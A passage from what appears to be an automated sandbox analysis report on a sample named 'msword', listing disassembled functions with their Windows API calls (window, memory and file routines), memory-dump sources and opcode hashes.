                                                                    • Associated: 0000000D.00000002.1868760543.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1869014806.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msword.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
                                                                    • Instruction ID: 61f7b93237898aea062553d5d4b8719da8ac7eccb5076a10c91df3859b53dd49
                                                                    • Opcode Fuzzy Hash: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
                                                                    • Instruction Fuzzy Hash: 98612771908248DBEF18CF19C894BAD3BF1FB44345F14812AFC56AA291C738E985DF86
                                                                    Function 00407C5F Relevance: 5.2, APIs: 4, Instructions: 156memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GlobalFree.KERNELBASE(?), ref: 004073C5
                                                                    • GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 004073CE
                                                                    • GlobalFree.KERNELBASE(?), ref: 0040743D
                                                                    • GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 00407448
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1868715864.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1868689499.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868760543.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1869014806.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msword.jbxd
                                                                    Similarity
                                                                    • API ID: Global$AllocFree
                                                                    • String ID:
                                                                    • API String ID: 3394109436-0
                                                                    • Opcode ID: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
                                                                    • Instruction ID: da36524f31269fd1e9de8fc6705d7123eeae9c681c0d19372ba3dadca10d6d3f
                                                                    • Opcode Fuzzy Hash: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
                                                                    • Instruction Fuzzy Hash: 81513871918248EBEF18CF19C894AAD3BF1FF44345F10812AFC56AA291C738E985DF85
                                                                    Function 0040139D Relevance: 3.0, APIs: 2, Instructions: 42windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                                                    • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1868715864.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1868689499.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868760543.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1869014806.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msword.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend
                                                                    • String ID:
                                                                    • API String ID: 3850602802-0
                                                                    • Opcode ID: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
                                                                    • Instruction ID: d71d45502f518029c3ce7990b7c8d381ac94a1bb539c673c2af025244294d997
                                                                    • Opcode Fuzzy Hash: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
                                                                    • Instruction Fuzzy Hash: 96F0F471A10220DFD7555B74DD04B273699AB80361F24463BF911F62F1E6B8DC528B4E
                                                                    Function 00405E50 Relevance: 3.0, APIs: 2, Instructions: 15fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                                    • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1868715864.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1868689499.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868760543.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1869014806.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msword.jbxd
                                                                    Similarity
                                                                    • API ID: File$AttributesCreate
                                                                    • String ID:
                                                                    • API String ID: 415043291-0
                                                                    • Opcode ID: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
                                                                    • Instruction ID: fe2e31f24f36ecb58ba6038de6e4569557e5a61990f2f31681ab57118d472e11
                                                                    • Opcode Fuzzy Hash: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
                                                                    • Instruction Fuzzy Hash: BCD09E71554202EFEF098F60DE1AF6EBBA2FB94B00F11852CB292550F0DAB25819DB15
                                                                    Function 00405E30 Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetFileAttributesW.KERNELBASE(?,00406E81,?,?,?), ref: 00405E34
                                                                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E47
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1868715864.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1868689499.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868760543.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1869014806.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msword.jbxd
                                                                    Similarity
                                                                    • API ID: AttributesFile
                                                                    • String ID:
                                                                    • API String ID: 3188754299-0
                                                                    • Opcode ID: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
                                                                    • Instruction ID: a99f375bd2b1051765f890e1d94d2f722c1bb1ba0a12d38356d8610c0186b9c0
                                                                    • Opcode Fuzzy Hash: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
                                                                    • Instruction Fuzzy Hash: 84C01272404800EAC6000B34DF0881A7B62AB90330B268B39B0BAE00F0CB3488A99A18
                                                                    Function 00403336 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033CE,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1868715864.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1868689499.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868760543.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1869014806.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msword.jbxd
                                                                    Similarity
                                                                    • API ID: FileRead
                                                                    • String ID:
                                                                    • API String ID: 2738559852-0
                                                                    • Opcode ID: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
                                                                    • Instruction ID: a3bc5d39330dd194e4c7332763fdc94ca13499671d705f1c19c6925397c50364
                                                                    • Opcode Fuzzy Hash: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
                                                                    • Instruction Fuzzy Hash: C8E08C32550118BFCB109EA69C40EE73B5CFB047A2F00C832BD55E5290DA30DA00EBE8
                                                                    Function 004037CC Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                                      • Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                                      • Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                                      • Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                                    • CreateDirectoryW.KERNELBASE(004D70C8,00000000,004D70C8,004D70C8,004D70C8,-00000002,00403A0B), ref: 004037ED
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1868715864.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1868689499.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868760543.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1869014806.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msword.jbxd
                                                                    Similarity
                                                                    • API ID: Char$Next$CreateDirectoryPrev
                                                                    • String ID:
                                                                    • API String ID: 4115351271-0
                                                                    • Opcode ID: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
                                                                    • Instruction ID: 8ea1286759415c6f695425ed34242866ebe8a7a529327a4e56f2759b30593fc1
                                                                    • Opcode Fuzzy Hash: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
                                                                    • Instruction Fuzzy Hash: B1D0A921083C3221C562332A3D06FCF090C8F2635AB02C07BF841B61CA8B2C4B8240EE
                                                                    Function 00403DAF Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1868715864.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1868689499.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868760543.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1869014806.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msword.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend
                                                                    • String ID:
                                                                    • API String ID: 3850602802-0
                                                                    • Opcode ID: 203c4a4104ade6b46efc04414fb016ca35add41c2a64233918ece76cb1940256
                                                                    • Instruction ID: 301fa2329b67e93c742f3c195cb428e9759bf169fd062939fd541a9b7e119014
                                                                    • Opcode Fuzzy Hash: 203c4a4104ade6b46efc04414fb016ca35add41c2a64233918ece76cb1940256
                                                                    • Instruction Fuzzy Hash: D3C04C71650601AADA108B509D45F1677595B50B41F544439B641F50E0D674E450DA1E
                                                                    Function 00403368 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040375A,?,?,?,?,00000000,00403A47,?), ref: 00403376
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1868715864.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1868689499.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868760543.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1869014806.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msword.jbxd
                                                                    Similarity
                                                                    • API ID: FilePointer
                                                                    • String ID:
                                                                    • API String ID: 973152223-0
                                                                    • Opcode ID: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
                                                                    • Instruction ID: da19c3e449f5d10d282cbd9bcc1d8f2f369397d5e390659c1e8fea63e82898b0
                                                                    • Opcode Fuzzy Hash: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
                                                                    • Instruction Fuzzy Hash: 0CB09231140204AEDA214B109E05F067A21FB94700F208824B2A0380F086711420EA0C
                                                                    Function 00403D98 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1868715864.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1868689499.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868760543.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1869014806.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msword.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend
                                                                    • String ID:
                                                                    • API String ID: 3850602802-0
                                                                    • Opcode ID: 8ef0c84af5b69eb6e5c04aecb335cbd5d798096170d60dc049d97623b8df0028
                                                                    • Instruction ID: f61ffac979fbda5733e9df3da2bdae5977773398d3d4f9e0d67d11d125479468
                                                                    • Opcode Fuzzy Hash: 8ef0c84af5b69eb6e5c04aecb335cbd5d798096170d60dc049d97623b8df0028
                                                                    • Instruction Fuzzy Hash: EFB09235181A00AADE614B00DF0AF457A62A764701F008079B245640B0CAB200E0DB08
                                                                    Function 00403D85 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • KiUserCallbackDispatcher.NTDLL(?,0040574D), ref: 00403D8F
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1868715864.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1868689499.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868760543.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1869014806.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msword.jbxd
                                                                    Similarity
                                                                    • API ID: CallbackDispatcherUser
                                                                    • String ID:
                                                                    • API String ID: 2492992576-0
                                                                    • Opcode ID: 7b5b3f07ec4b69a7f183f6b544b36b38adf2938630adbd4e30d083ffe7510c70
                                                                    • Instruction ID: d14db2bc66c636a64d409f7b36464c270e9f3e97be8c2f7aaa1954d4611ec3db
                                                                    • Opcode Fuzzy Hash: 7b5b3f07ec4b69a7f183f6b544b36b38adf2938630adbd4e30d083ffe7510c70
                                                                    • Instruction Fuzzy Hash: 8DA01275005500DBCF014B40EF048067A61B7503007108478F1810003086310420EB08

                                                                    Non-executed Functions

                                                                    Function 0040497C Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 470windowmemoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetDlgItem.USER32(?,000003F9), ref: 00404993
                                                                    • GetDlgItem.USER32(?,00000408), ref: 004049A0
                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 004049EF
                                                                    • LoadBitmapW.USER32(0000006E), ref: 00404A02
                                                                    • SetWindowLongW.USER32(?,000000FC,Function_000048CC), ref: 00404A1C
                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A2E
                                                                    • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A42
                                                                    • SendMessageW.USER32(?,00001109,00000002), ref: 00404A58
                                                                    • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A64
                                                                    • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404A74
                                                                    • DeleteObject.GDI32(?), ref: 00404A79
                                                                    • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AA4
                                                                    • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404AB0
                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B51
                                                                    • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404B74
                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B85
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00404BAF
                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BBE
                                                                    • ShowWindow.USER32(?,00000005), ref: 00404BCF
                                                                    • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CCD
                                                                    • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D28
                                                                    • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D3D
                                                                    • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D61
                                                                    • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404D87
                                                                    • ImageList_Destroy.COMCTL32(?), ref: 00404D9C
                                                                    • GlobalFree.KERNEL32(?), ref: 00404DAC
                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E1C
                                                                    • SendMessageW.USER32(?,00001102,?,?), ref: 00404ECA
                                                                    • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404ED9
                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00404EF9
                                                                    • ShowWindow.USER32(?,00000000), ref: 00404F49
                                                                    • GetDlgItem.USER32(?,000003FE), ref: 00404F54
                                                                    • ShowWindow.USER32(00000000), ref: 00404F5B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1868715864.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1868689499.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
